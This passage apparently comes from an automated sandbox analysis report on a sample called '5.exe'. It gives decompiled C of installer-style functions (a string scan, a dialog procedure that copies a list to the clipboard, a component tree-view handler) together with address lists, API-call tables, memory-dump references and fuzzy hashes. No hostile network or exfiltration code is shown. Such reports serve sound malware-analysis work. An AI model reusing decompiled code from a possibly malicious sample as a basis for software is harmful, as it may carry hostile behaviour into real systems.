				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                              0x00405449
                                                                                              0x0040545c
                                                                                              0x0040545c
                                                                                              0x00405460
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405453
                                                                                              0x00405456
                                                                                              0x00000000
                                                                                              0x00405456
                                                                                              0x00000000
                                                                                              0x00405453
                                                                                              0x00405462

                                                                                              APIs
                                                                                              • CharNextA.USER32(?,0040318E,"C:\Users\user\Desktop\5.exe" ,00000020), ref: 00405456
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CharNext
                                                                                              • String ID:
                                                                                              • API String ID: 3213498283-0
                                                                                              • Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                              • Instruction ID: cdd2aa403d07c31b3ee0935f840b55cc407e0efebad9d97fc36691482a7c56ad
                                                                                              • Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                              • Instruction Fuzzy Hash: 09C0802444C64077C510572045247EB7FF0EA51342F58C457F4C163251C134ACC48F37
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00404E07, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 278windowclipboardmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e344; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x429fd8;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e32c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42eb68, 8);
							__eflags =  *0x42ebec - _t149; // 0x0
							if(__eflags == 0) {
								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
							}
							E00403CB6(1);
							goto L25;
						}
						 *0x4293a0 = 2;
						E00403CB6(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403D44(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e330, _t149);
						ShowWindow(_t154, 8);
						E00403D12(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42eb70; // 0x654160
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e330 = GetDlgItem(_a4, 0x403);
				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e344 = _t127;
				_v8 = _t127;
				E00403D12( *0x42e330);
				 *0x42e334 = E0040456B(4);
				 *0x42e34c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403CDD(_a4);
				if(( *0x42eb78 & 0x00000003) != 0) {
					ShowWindow( *0x42e330, _t149);
					if(( *0x42eb78 & 0x00000002) != 0) {
						 *0x42e330 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403D12( *0x42e328);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42eb78 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                                                              0x00404e10
                                                                                              0x00404e16
                                                                                              0x00404e1f
                                                                                              0x00404e22
                                                                                              0x00404fb3
                                                                                              0x00404fba
                                                                                              0x00404fde
                                                                                              0x00404fde
                                                                                              0x00404fe4
                                                                                              0x00404ff1
                                                                                              0x0040500f
                                                                                              0x0040500f
                                                                                              0x00405016
                                                                                              0x0040506d
                                                                                              0x0040506d
                                                                                              0x00405071
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405073
                                                                                              0x00405076
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405080
                                                                                              0x00405086
                                                                                              0x00405088
                                                                                              0x0040508b
                                                                                              0x00405184
                                                                                              0x00000000
                                                                                              0x00405184
                                                                                              0x0040509a
                                                                                              0x004050a6
                                                                                              0x004050ac
                                                                                              0x004050af
                                                                                              0x004050b2
                                                                                              0x004050c7
                                                                                              0x004050ca
                                                                                              0x004050ca
                                                                                              0x004050cd
                                                                                              0x004050b4
                                                                                              0x004050b9
                                                                                              0x004050bf
                                                                                              0x004050c2
                                                                                              0x004050c2
                                                                                              0x004050dd
                                                                                              0x004050e5
                                                                                              0x004050e6
                                                                                              0x004050e8
                                                                                              0x004050f1
                                                                                              0x004050f4
                                                                                              0x004050fb
                                                                                              0x00405102
                                                                                              0x0040510a
                                                                                              0x0040510a
                                                                                              0x00405118
                                                                                              0x0040511e
                                                                                              0x00405121
                                                                                              0x00405121
                                                                                              0x00405128
                                                                                              0x0040512e
                                                                                              0x00405137
                                                                                              0x0040513e
                                                                                              0x00405147
                                                                                              0x00405149
                                                                                              0x0040514c
                                                                                              0x0040515b
                                                                                              0x0040515d
                                                                                              0x00405163
                                                                                              0x00405164
                                                                                              0x00405165
                                                                                              0x00405165
                                                                                              0x0040516d
                                                                                              0x00405178
                                                                                              0x0040517e
                                                                                              0x0040517e
                                                                                              0x00000000
                                                                                              0x004050e8
                                                                                              0x00405018
                                                                                              0x0040501e
                                                                                              0x0040504e
                                                                                              0x00405050
                                                                                              0x00405056
                                                                                              0x00405061
                                                                                              0x00405061
                                                                                              0x00405068
                                                                                              0x00000000
                                                                                              0x00405068
                                                                                              0x00405022
                                                                                              0x0040502c
                                                                                              0x00000000
                                                                                              0x00404ff3
                                                                                              0x00404ff3
                                                                                              0x00404ff9
                                                                                              0x00405031
                                                                                              0x00000000
                                                                                              0x0040503a
                                                                                              0x00405002
                                                                                              0x00405007
                                                                                              0x0040500a
                                                                                              0x00000000
                                                                                              0x0040500a
                                                                                              0x00404ff1
                                                                                              0x00404e28
                                                                                              0x00404e2c
                                                                                              0x00404e35
                                                                                              0x00404e3c
                                                                                              0x00404e3f
                                                                                              0x00404e42
                                                                                              0x00404e45
                                                                                              0x00404e46
                                                                                              0x00404e47
                                                                                              0x00404e60
                                                                                              0x00404e63
                                                                                              0x00404e6d
                                                                                              0x00404e7c
                                                                                              0x00404e84
                                                                                              0x00404e8c
                                                                                              0x00404e91
                                                                                              0x00404e94
                                                                                              0x00404ea0
                                                                                              0x00404ea9
                                                                                              0x00404eb2
                                                                                              0x00404ed5
                                                                                              0x00404edb
                                                                                              0x00404eec
                                                                                              0x00404ef1
                                                                                              0x00404eff
                                                                                              0x00404f0d
                                                                                              0x00404f0d
                                                                                              0x00404f12
                                                                                              0x00404f20
                                                                                              0x00404f20
                                                                                              0x00404f25
                                                                                              0x00404f28
                                                                                              0x00404f2d
                                                                                              0x00404f39
                                                                                              0x00404f42
                                                                                              0x00404f4f
                                                                                              0x00404f5e
                                                                                              0x00404f51
                                                                                              0x00404f56
                                                                                              0x00404f56
                                                                                              0x00404f6a
                                                                                              0x00404f6a
                                                                                              0x00404f7e
                                                                                              0x00404f87
                                                                                              0x00404f90
                                                                                              0x00404fa0
                                                                                              0x00404fac
                                                                                              0x00404fac
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00404E66
                                                                                              • GetDlgItem.USER32 ref: 00404E75
                                                                                              • GetClientRect.USER32 ref: 00404EB2
                                                                                              • GetSystemMetrics.USER32 ref: 00404EBA
                                                                                              • SendMessageA.USER32 ref: 00404EDB
                                                                                              • SendMessageA.USER32 ref: 00404EEC
                                                                                              • SendMessageA.USER32 ref: 00404EFF
                                                                                              • SendMessageA.USER32 ref: 00404F0D
                                                                                              • SendMessageA.USER32 ref: 00404F20
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00404F56
                                                                                              • GetDlgItem.USER32 ref: 00404F77
                                                                                              • SendMessageA.USER32 ref: 00404F87
                                                                                              • SendMessageA.USER32 ref: 00404FA0
                                                                                              • SendMessageA.USER32 ref: 00404FAC
                                                                                              • GetDlgItem.USER32 ref: 00404E84
                                                                                                • Part of subcall function 00403D12: SendMessageA.USER32 ref: 00403D20
                                                                                              • GetDlgItem.USER32 ref: 00404FC9
                                                                                              • CreateThread.KERNEL32 ref: 00404FD7
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                                                                              • ShowWindow.USER32(00000000), ref: 00405002
                                                                                              • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                                                                              • ShowWindow.USER32(00000008), ref: 0040504E
                                                                                              • SendMessageA.USER32 ref: 00405080
                                                                                              • CreatePopupMenu.USER32 ref: 00405091
                                                                                              • AppendMenuA.USER32 ref: 004050A6
                                                                                              • GetWindowRect.USER32 ref: 004050B9
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                                                                              • SendMessageA.USER32 ref: 00405118
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405128
                                                                                              • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                                                                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                                                                              • GlobalLock.KERNEL32 ref: 00405141
                                                                                              • SendMessageA.USER32 ref: 00405155
                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                                                                              • SetClipboardData.USER32 ref: 00405178
                                                                                              • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040517E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: `Ae${
                                                                                              • API String ID: 590372296-77332433
                                                                                              • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                                                              • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                                                                              • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                                                              • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404618, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42eb88; // 0x65430c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42eb70; // 0x654160
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42eb79 & 0x00000002;
							if(( *0x42eb79 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404598(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42eb78; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x429fb4;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x429fcc;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x429fb4 = _t315;
									 *0x429fcc = _t315;
									 *0x42ebc0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42eb79 & 0x00000001;
										if(( *0x42eb79 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42eb8c - _t315; // 0x1
										_v32 =  *0x429fcc;
										_t196 =  *0x42eb88; // 0x65430c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e33c; // 0x65aa00
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x654314
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x654324
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42eb8c; // 0x1
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x429fcc);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ebc0 = _a4;
					_t247 =  *0x42eb8c; // 0x1
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
					_v24 = _t250;
					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x429fb4 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403CDD(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403CDD(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42eb8c - _t318; // 0x1
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x429fcc + _t318 * 4) = _t274;
									_t288 =  *( *0x429fcc + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42eb8c; // 0x1
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403D12(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403D12(_v12);
								L89:
								return E00403D44(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                                                              0x00404636
                                                                                              0x0040463c
                                                                                              0x0040463e
                                                                                              0x00404644
                                                                                              0x0040464a
                                                                                              0x0040464d
                                                                                              0x00404657
                                                                                              0x00404660
                                                                                              0x00404663
                                                                                              0x00404666
                                                                                              0x0040488e
                                                                                              0x0040488e
                                                                                              0x00404895
                                                                                              0x004048a9
                                                                                              0x00404897
                                                                                              0x00404899
                                                                                              0x0040489c
                                                                                              0x0040489d
                                                                                              0x004048a4
                                                                                              0x004048a4
                                                                                              0x004048ac
                                                                                              0x004048b5
                                                                                              0x004048c0
                                                                                              0x004048c0
                                                                                              0x004048c3
                                                                                              0x004048c6
                                                                                              0x004048d5
                                                                                              0x004048d5
                                                                                              0x004048dc
                                                                                              0x00404954
                                                                                              0x00404954
                                                                                              0x00404957
                                                                                              0x00404959
                                                                                              0x0040495c
                                                                                              0x00404963
                                                                                              0x00404971
                                                                                              0x00404971
                                                                                              0x00404973
                                                                                              0x00404976
                                                                                              0x0040497d
                                                                                              0x0040497f
                                                                                              0x00404983
                                                                                              0x004049a0
                                                                                              0x004049a4
                                                                                              0x004049a4
                                                                                              0x00404985
                                                                                              0x00404992
                                                                                              0x00404992
                                                                                              0x00404983
                                                                                              0x0040497d
                                                                                              0x00000000
                                                                                              0x00404957
                                                                                              0x004048de
                                                                                              0x004048e1
                                                                                              0x004048ec
                                                                                              0x004048ee
                                                                                              0x004048f1
                                                                                              0x004048f8
                                                                                              0x004048fd
                                                                                              0x004048ff
                                                                                              0x00404909
                                                                                              0x00404909
                                                                                              0x0040490d
                                                                                              0x0040490f
                                                                                              0x00404912
                                                                                              0x00404914
                                                                                              0x00404917
                                                                                              0x0040492d
                                                                                              0x0040492d
